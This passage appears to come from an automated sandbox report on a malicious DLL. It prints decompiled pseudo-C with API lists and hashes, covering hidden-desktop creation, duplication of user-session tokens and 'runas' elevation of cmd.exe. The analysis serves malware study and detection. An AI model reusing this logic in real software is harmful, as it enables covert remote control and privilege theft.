                                                                                                                        					_v52 = _t185;
                                                                                                                        					_push( &_v52);
                                                                                                                        					_push(_t85);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x48))))() < 0) {
                                                                                                                        						L34:
                                                                                                                        						_t88 = _v52;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
                                                                                                                        						if(_v48 != _t185) {
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        						goto L35;
                                                                                                                        					}
                                                                                                                        					_t138 = __imp__#2;
                                                                                                                        					_t194 =  *_t138(_v28);
                                                                                                                        					if(_t194 == _t185) {
                                                                                                                        						L33:
                                                                                                                        						_t92 = _v64;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
                                                                                                                        						goto L34;
                                                                                                                        					}
                                                                                                                        					_t186 =  *_t138(_v28);
                                                                                                                        					_t189 = 0;
                                                                                                                        					if(_t186 == 0) {
                                                                                                                        						L32:
                                                                                                                        						__imp__#6(_t194);
                                                                                                                        						_t185 = 0;
                                                                                                                        						goto L33;
                                                                                                                        					}
                                                                                                                        					_t95 = _v68;
                                                                                                                        					_push( &_v64);
                                                                                                                        					_v64 = 0;
                                                                                                                        					_push(_t186);
                                                                                                                        					_push(_t95);
                                                                                                                        					if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x28))))() < 0) {
                                                                                                                        						L21:
                                                                                                                        						if(_v52 != _t189) {
                                                                                                                        							_t98 =  &_v84;
                                                                                                                        							_v84 = _t189;
                                                                                                                        							__imp__CoCreateInstance(0x6f33e09c, _t189, 1, 0x6f33e06c, _t98);
                                                                                                                        							if(_t98 >= 0) {
                                                                                                                        								_t99 = _v60;
                                                                                                                        								if(_t99 != 0) {
                                                                                                                        									_t189 =  *_t138(_t99);
                                                                                                                        								}
                                                                                                                        								_t100 = _v104;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x30))))(_t100, _t194);
                                                                                                                        								_t102 = _v112;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x20))))(_t102, _t186);
                                                                                                                        								if(_t189 != 0) {
                                                                                                                        									_t117 = _v120;
                                                                                                                        									 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x28))))(_t117, _t189);
                                                                                                                        								}
                                                                                                                        								_t104 = _v120;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x40))))(_t104, 0x100);
                                                                                                                        								_t106 = _v128;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x98))))(_t106, 0x7fffffff);
                                                                                                                        								_t108 = _v136;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0xa8))))(_t108, 1);
                                                                                                                        								_t110 = _v144;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x88))))(_t110, 0xffffffff);
                                                                                                                        								_t112 = _v148;
                                                                                                                        								_push(_v152);
                                                                                                                        								_push(_t112);
                                                                                                                        								if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x20))))() >= 0) {
                                                                                                                        									_v144 = 1;
                                                                                                                        								}
                                                                                                                        								_t115 = _v160;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))(_t115);
                                                                                                                        								if(_t189 != 0) {
                                                                                                                        									__imp__#6(_t189);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						L31:
                                                                                                                        						__imp__#6(_t186);
                                                                                                                        						goto L32;
                                                                                                                        					}
                                                                                                                        					_t120 = _v76;
                                                                                                                        					_v84 = 0;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x2c))))(_t120,  &_v84);
                                                                                                                        					_t123 = lstrcmpiW(_t194, _v92);
                                                                                                                        					_t190 = _v44;
                                                                                                                        					if(_t123 == 0) {
                                                                                                                        						if(_t190 == 0) {
                                                                                                                        							_t130 = _v84;
                                                                                                                        							_v76 = _t190;
                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x84))))(_t130,  &_v76);
                                                                                                                        							if(_v84 == _t190) {
                                                                                                                        								_t132 = _v92;
                                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x88))))(_t132, 0xffffffff);
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						_v76 = 1;
                                                                                                                        					}
                                                                                                                        					_t124 = _v84;
                                                                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
                                                                                                                        					if(_v80 != 0) {
                                                                                                                        						if(_t190 != 0) {
                                                                                                                        							_t126 = _v92;
                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x24))))(_t126, _t186);
                                                                                                                        						}
                                                                                                                        						goto L31;
                                                                                                                        					} else {
                                                                                                                        						_t128 = _v92;
                                                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0x24))))(_t128, _t186);
                                                                                                                        						_t189 = 0;
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t191 = 0x6f33d820;
                                                                                                                        					do {
                                                                                                                        						_t134 =  *_t191;
                                                                                                                        						if((_v32 & _t134) == 0) {
                                                                                                                        							goto L7;
                                                                                                                        						}
                                                                                                                        						_t161 = _v44;
                                                                                                                        						_push( &_v36);
                                                                                                                        						_v36 = _t185;
                                                                                                                        						_push(_t134);
                                                                                                                        						_push(_t161);
                                                                                                                        						if( *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x20))))() < 0 || _v48 != _t185) {
                                                                                                                        							_v48 = _t185;
                                                                                                                        							goto L10;
                                                                                                                        						} else {
                                                                                                                        							_v48 = 1;
                                                                                                                        						}
                                                                                                                        						L7:
                                                                                                                        						_t191 =  &(_t191[1]);
                                                                                                                        					} while (_t191 < "\"%s\" f");
                                                                                                                        					goto L10;
                                                                                                                        				}
                                                                                                                        			}































































                                                                                                                        APIs
                                                                                                                        • CoCreateInstance.OLE32(6F33E0BC,00000000,00000001,6F33E07C,?), ref: 6F334789
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33481D
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33482E
                                                                                                                        • lstrcmpiW.KERNEL32(00000000,?), ref: 6F334875
                                                                                                                        • CoCreateInstance.OLE32(6F33E09C,00000000,00000001,6F33E06C,?), ref: 6F334905
                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 6F33491C
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349C0
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349C7
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 6F3349CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: String$AllocFree$CreateInstance$lstrcmpi
                                                                                                                        • String ID: "%s" f
                                                                                                                        • API String ID: 1501015606-2173819097
                                                                                                                        • Opcode ID: 23e562c0d6e06a2b06c6cb59018d78ac48cc03348a408a496fdc118bddb327dd
                                                                                                                        • Instruction ID: c32771a2695a69ceee25197c93ab087ed40e667b8df5f0d45bdcb0e6e172035b
                                                                                                                        • Opcode Fuzzy Hash: 23e562c0d6e06a2b06c6cb59018d78ac48cc03348a408a496fdc118bddb327dd
                                                                                                                        • Instruction Fuzzy Hash: A9911576A047529FC200DF69C880D5BB7E9BFC9704F104A4DF5958B264DB32E846CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 95%
                                                                                                                        			E6F335060(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                        				char _v256;
                                                                                                                        				char _v264;
                                                                                                                        				intOrPtr _t11;
                                                                                                                        				intOrPtr _t18;
                                                                                                                        				void* _t21;
                                                                                                                        				intOrPtr _t22;
                                                                                                                        				void* _t23;
                                                                                                                        				char* _t24;
                                                                                                                        				void* _t29;
                                                                                                                        
                                                                                                                        				_t24 =  &_v264;
                                                                                                                        				_t18 = _a12;
                                                                                                                        				_t22 = _a8;
                                                                                                                        				_t21 = 0;
                                                                                                                        				if(_t22 != 0 || _t18 != 0) {
                                                                                                                        					_t29 = M6F34050C - _t21; // 0x0
                                                                                                                        					if(_t29 != 0) {
                                                                                                                        						E6F333700("USBManager", 0);
                                                                                                                        						_t24 =  &(_t24[8]);
                                                                                                                        					}
                                                                                                                        					if(_t22 == 0) {
                                                                                                                        						if(_t18 == 0) {
                                                                                                                        							goto L8;
                                                                                                                        						}
                                                                                                                        						goto L9;
                                                                                                                        					} else {
                                                                                                                        						_t11 = M6F34057C; // 0x784250
                                                                                                                        						wsprintfA( &_v264, "%s%s%c", "Global\\", _t11, 0x52);
                                                                                                                        						_t23 = OpenEventA(2, 0,  &_v256);
                                                                                                                        						if(_t23 == 0) {
                                                                                                                        							goto L10;
                                                                                                                        						} else {
                                                                                                                        							SetEvent(_t23);
                                                                                                                        							CloseHandle(_t23);
                                                                                                                        							return _t21;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					L8:
                                                                                                                        					_push(0);
                                                                                                                        					_t21 = E6F334FE0(_a4);
                                                                                                                        					L9:
                                                                                                                        					CloseHandle(CreateThread(0, 0, 0x6f332d50, 0, 0, 0));
                                                                                                                        					L10:
                                                                                                                        					return _t21;
                                                                                                                        				}
                                                                                                                        			}

                                                                                                                        0x6f335119
                                                                                                                        0x6f33511f
                                                                                                                        0x6f33512a
                                                                                                                        0x6f33512a

                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 6F3350B3
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3350C5
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F3350D2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3350D9
                                                                                                                        • CreateThread.KERNEL32 ref: 6F335112
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F335119
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEventHandle$CreateOpenThreadwsprintf
                                                                                                                        • String ID: %s%s%c$Global\$PBx$USBManager
                                                                                                                        • API String ID: 1587369599-1791046797
                                                                                                                        • Opcode ID: 85c7e7e6991666bc77e4d26e67e258fd71924913f5b5bcfb6734b0244e8a529b
                                                                                                                        • Instruction ID: f0e2f0cd991706fad068346b22cdb43a5c9a7f315d357111f002c1193962111e
                                                                                                                        • Opcode Fuzzy Hash: 85c7e7e6991666bc77e4d26e67e258fd71924913f5b5bcfb6734b0244e8a529b
                                                                                                                        • Instruction Fuzzy Hash: A9113D77F44BA12BE670E6599C46FDA331DEB85B22F004028FF549A280CA66F41947F5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E6F3334B0() {
                                                                                                                        				void* _t32;
                                                                                                                        				void* _t33;
                                                                                                                        				void* _t35;
                                                                                                                        				void* _t53;
                                                                                                                        				void* _t55;
                                                                                                                        				void* _t58;
                                                                                                                        				void* _t59;
                                                                                                                        				void* _t61;
                                                                                                                        				void* _t64;
                                                                                                                        				void* _t65;
                                                                                                                        
                                                                                                                        				_t59 =  *(_t65 + 0x20);
                                                                                                                        				 *(_t65 + 0x10) = 0;
                                                                                                                        				_t64 = 0;
                                                                                                                        				do {
                                                                                                                        					 *(_t65 + 0x20) = 0;
                                                                                                                        					 *(_t65 + 0x14) = 0;
                                                                                                                        					if(_t59 != 0xffffffff) {
                                                                                                                        						_push(_t65 + 0x14);
                                                                                                                        						_t32 = _t65 + 0x24;
                                                                                                                        						_push(_t32);
                                                                                                                        						_push(8);
                                                                                                                        						_push(_t59);
                                                                                                                        						_push(0);
                                                                                                                        						L6F33C36C();
                                                                                                                        						if(_t32 == 0) {
                                                                                                                        							goto L14;
                                                                                                                        						} else {
                                                                                                                        							_t35 =  *(_t65 + 0x20);
                                                                                                                        							if( *_t35 == 0) {
                                                                                                                        								 *(_t65 + 0x10) = 1;
                                                                                                                        							}
                                                                                                                        							_push(_t35);
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_t33 = _t65 + 0x14;
                                                                                                                        						_push(_t33);
                                                                                                                        						_push(_t65 + 0x24);
                                                                                                                        						_push(1);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						L6F33C372();
                                                                                                                        						if(_t33 == 0) {
                                                                                                                        							goto L14;
                                                                                                                        						} else {
                                                                                                                        							_t55 =  *(_t65 + 0x14);
                                                                                                                        							_t61 =  *(_t65 + 0x20);
                                                                                                                        							_t53 = 0;
                                                                                                                        							_t35 = _t61;
                                                                                                                        							if(_t55 <= 0) {
                                                                                                                        								L8:
                                                                                                                        								_push(_t61);
                                                                                                                        							} else {
                                                                                                                        								while( *((intOrPtr*)(_t35 + 8)) != 0) {
                                                                                                                        									_t53 = _t53 + 1;
                                                                                                                        									_t35 = _t35 + 0xc;
                                                                                                                        									if(_t53 < _t55) {
                                                                                                                        										continue;
                                                                                                                        									} else {
                                                                                                                        										_push(_t61);
                                                                                                                        									}
                                                                                                                        									goto L13;
                                                                                                                        								}
                                                                                                                        								_t59 =  *_t35;
                                                                                                                        								 *(_t65 + 0x10) = 1;
                                                                                                                        								goto L8;
                                                                                                                        							}
                                                                                                                        							L13:
                                                                                                                        							L6F33C366();
                                                                                                                        							if( *(_t65 + 0x10) != 0) {
                                                                                                                        								_push(_t65 + 0x14);
                                                                                                                        								_push(_t59);
                                                                                                                        								 *((intOrPtr*)(_t65 + 0x1c)) = 0;
                                                                                                                        								L6F33C360();
                                                                                                                        								if(_t35 == 0) {
                                                                                                                        									break;
                                                                                                                        								} else {
                                                                                                                        									 *((intOrPtr*)(_t65 + 0x38)) = 0;
                                                                                                                        									if(DuplicateTokenEx( *(_t65 + 0x14), 0x2000000, 0, 1, 1, _t65 + 0x20) == 0) {
                                                                                                                        										break;
                                                                                                                        									} else {
                                                                                                                        										_push(4);
                                                                                                                        										_push(_t65 + 0x14);
                                                                                                                        										 *(_t65 + 0x20) = 0;
                                                                                                                        										L6F33C2EE();
                                                                                                                        										if(GetTokenInformation( *(_t65 + 0x20), 0x13, _t65 + 0x18, 4, _t65 + 0x18) != 0) {
                                                                                                                        											CloseHandle( *(_t65 + 0x20));
                                                                                                                        											CloseHandle( *(_t65 + 0x14));
                                                                                                                        											return  *(_t65 + 0x10);
                                                                                                                        										} else {
                                                                                                                        											_t58 =  *(_t65 + 0x20);
                                                                                                                        											 *(_t65 + 0x14) = _t58;
                                                                                                                        											CloseHandle( *(_t65 + 0x14));
                                                                                                                        											return _t58;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								goto L14;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					L21:
                                                                                                                        					L14:
                                                                                                                        					Sleep(0x1f4);
                                                                                                                        					_t64 = _t64 + 1;
                                                                                                                        				} while (_t64 < 0x78);
                                                                                                                        				return 0;
                                                                                                                        				goto L21;
                                                                                                                        			}













                                                                                                                        0x6f333599
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333545
                                                                                                                        0x6f3334e5
                                                                                                                        0x00000000
                                                                                                                        0x6f333547
                                                                                                                        0x6f33354c
                                                                                                                        0x6f333552
                                                                                                                        0x6f333553
                                                                                                                        0x6f333565
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F3334DE
                                                                                                                        • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F333522
                                                                                                                        • WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33353C
                                                                                                                        • Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33354C
                                                                                                                        • WTSQueryUserToken.WTSAPI32(?,?,?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F333570
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?,?,00000000,?,00000008,?,?,00000000,74784F20), ref: 6F333591
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000004), ref: 6F3335A6
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,00000000,74784F20), ref: 6F3335BE
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335DD
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335EE
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleToken$InformationMemoryQuery$DuplicateEnumerateFreeSessionSessionsSleepUserZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 935900411-0
                                                                                                                        • Opcode ID: 87a98838fc81e9c8613c2c5544f09159438cbfb532add6b935c5ccd1851c2fd9
                                                                                                                        • Instruction ID: 61162ad227356fac011b255bfeb04e741221c3df9ebe60a7c4868b1a3e237806
                                                                                                                        • Opcode Fuzzy Hash: 87a98838fc81e9c8613c2c5544f09159438cbfb532add6b935c5ccd1851c2fd9
                                                                                                                        • Instruction Fuzzy Hash: A3418372A083959BE700DF55D881E6BB3E9FFC4B14F004A2EF58597180D775E908CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F339C50(struct HWND__* _a4, intOrPtr _a8, char _a12) {
                                                                                                                        				intOrPtr _t5;
                                                                                                                        				void* _t15;
                                                                                                                        				char _t21;
                                                                                                                        				struct HWND__* _t26;
                                                                                                                        
                                                                                                                        				_t5 = _a8;
                                                                                                                        				if(_t5 == 0) {
                                                                                                                        					_t26 = _a4;
                                                                                                                        					SetWindowLongA(_t26, 0xffffffec, GetWindowLongA(_t26, 0xffffffec) | 0x00000008);
                                                                                                                        					SetWindowPos(_t26, 0xffffffff, 0, 0, 0, 0, 3);
                                                                                                                        					BringWindowToTop(_t26);
                                                                                                                        					SetForegroundWindow(_t26);
                                                                                                                        					SendMessageA(_t26, 0x473, 1, 1);
                                                                                                                        					SendMessageA(_t26, 0x46f, 8, 0);
                                                                                                                        					goto L7;
                                                                                                                        				} else {
                                                                                                                        					_t15 = _t5 - 2;
                                                                                                                        					if(_t15 == 0) {
                                                                                                                        						_t21 = "\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						_push(0);
                                                                                                                        						if(E6F334230("runas", "cmd.exe", _t21) != 0) {
                                                                                                                        							goto L7;
                                                                                                                        						} else {
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						if(_t15 != 0x83f0) {
                                                                                                                        							L7:
                                                                                                                        							return 0;
                                                                                                                        						} else {
                                                                                                                        							"\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _a12;
                                                                                                                        							return 0;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}








                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32 ref: 6F339CAB
                                                                                                                        • SetWindowLongA.USER32 ref: 6F339CB8
                                                                                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?,?,00000001,FF000000), ref: 6F339CCB
                                                                                                                        • BringWindowToTop.USER32(00000000), ref: 6F339CD2
                                                                                                                        • SetForegroundWindow.USER32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F339CD9
                                                                                                                        • SendMessageA.USER32(00000000,00000473,00000001,00000001), ref: 6F339CEF
                                                                                                                        • SendMessageA.USER32(00000000,0000046F,00000008,00000000), ref: 6F339CFB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$LongMessageSend$BringForeground
                                                                                                                        • String ID: cmd.exe$runas
                                                                                                                        • API String ID: 4108379202-3213582026
                                                                                                                        • Opcode ID: 555d3d43088666f46df829d9956af25fa9106857c7ef8af4542967abe5e26d94
                                                                                                                        • Instruction ID: b32eff405f08732c2e7ed454381ec473309fef06366ecf7992b5a1978658f110
                                                                                                                        • Opcode Fuzzy Hash: 555d3d43088666f46df829d9956af25fa9106857c7ef8af4542967abe5e26d94
                                                                                                                        • Instruction Fuzzy Hash: 4211C8337456A877E621DA28CC06F8A366EEB82B31F104218F751EA0C4CBB56510C769
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F339BD0(void* _a4) {
                                                                                                                        				struct HDESK__* _t3;
                                                                                                                        				struct HDESK__* _t9;
                                                                                                                        				void* _t11;
                                                                                                                        
                                                                                                                        				_t3 = GetThreadDesktop(GetCurrentThreadId());
                                                                                                                        				 *0x6f340484 = _t3;
                                                                                                                        				if(_t3 != 0) {
                                                                                                                        					_t3 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
                                                                                                                        					 *0x6f340480 = _t3;
                                                                                                                        					if(_t3 != 0) {
                                                                                                                        						_t11 = CreateThread(0, 0, E6F3396D0, _a4, 0, 0);
                                                                                                                        						if(_t11 != 0) {
                                                                                                                        							WaitForSingleObject(_t11, 0xffffffff);
                                                                                                                        							CloseHandle(_t11);
                                                                                                                        							Sleep(0xfa0);
                                                                                                                        						}
                                                                                                                        						_t9 =  *0x6f340480; // 0x0
                                                                                                                        						return CloseDesktop(_t9);
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t3;
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F339BD0
                                                                                                                        • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6F339BD7
                                                                                                                        • CreateDesktopA.USER32 ref: 6F339BF8
                                                                                                                        • CreateThread.KERNEL32 ref: 6F339C1A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?), ref: 6F339C29
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F339C30
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?), ref: 6F339C3B
                                                                                                                        • CloseDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6F339C48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopThread$CloseCreate$CurrentHandleObjectSingleSleepWait
                                                                                                                        • String ID: TVRF_Instance
                                                                                                                        • API String ID: 4135746217-3589830093
                                                                                                                        • Opcode ID: fedd9254724c76e711d53106da9812ed215534b8b0421131250b4c86665399ae
                                                                                                                        • Instruction ID: 3b1c4acbcab4871b2534a89a24d0069648c58b50cac7b3d4e0e0623ae70a3b4e
                                                                                                                        • Opcode Fuzzy Hash: fedd9254724c76e711d53106da9812ed215534b8b0421131250b4c86665399ae
                                                                                                                        • Instruction Fuzzy Hash: 2BF03177A41EA6EBEA71EB608C49F55366EAB06731F100108F611A52C4CF70E4209A18
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E6F3369C0(CHAR* _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
                                                                                                                        				char _v8;
                                                                                                                        				char _v11;
                                                                                                                        				char _v12;
                                                                                                                        				short _v15;
                                                                                                                        				char _v16;
                                                                                                                        				CHAR* _t19;
                                                                                                                        				CHAR* _t21;
                                                                                                                        				CHAR* _t22;
                                                                                                                        				CHAR* _t24;
                                                                                                                        				signed char _t26;
                                                                                                                        				signed int _t27;
                                                                                                                        				CHAR* _t30;
                                                                                                                        				CHAR* _t35;
                                                                                                                        				CHAR* _t39;
                                                                                                                        				CHAR* _t40;
                                                                                                                        				CHAR* _t43;
                                                                                                                        				CHAR* _t46;
                                                                                                                        				CHAR* _t48;
                                                                                                                        
                                                                                                                        				_t19 = M6F3404CC; // 0x99d818
                                                                                                                        				_t40 = M6F3404DC; // 0x99b1c8
                                                                                                                        				_t46 = _a4;
                                                                                                                        				_v16 = 0x6e6468;
                                                                                                                        				WritePrivateProfileStringA(_t40,  &_v16, _t46, _t19);
                                                                                                                        				_t21 = M6F3404CC; // 0x99d818
                                                                                                                        				_t22 = M6F3404DC; // 0x99b1c8
                                                                                                                        				asm("sbb ecx, ecx");
                                                                                                                        				_t35 =  ~_t46 & _a8;
                                                                                                                        				_v15 = 0x70;
                                                                                                                        				WritePrivateProfileStringA(_t22,  &_v16, _t35, _t21);
                                                                                                                        				_t24 = M6F3404CC; // 0x99d818
                                                                                                                        				asm("sbb esi, esi");
                                                                                                                        				_t48 =  ~_t46 &  &_v12;
                                                                                                                        				_t43 = M6F3404DC; // 0x99b1c8
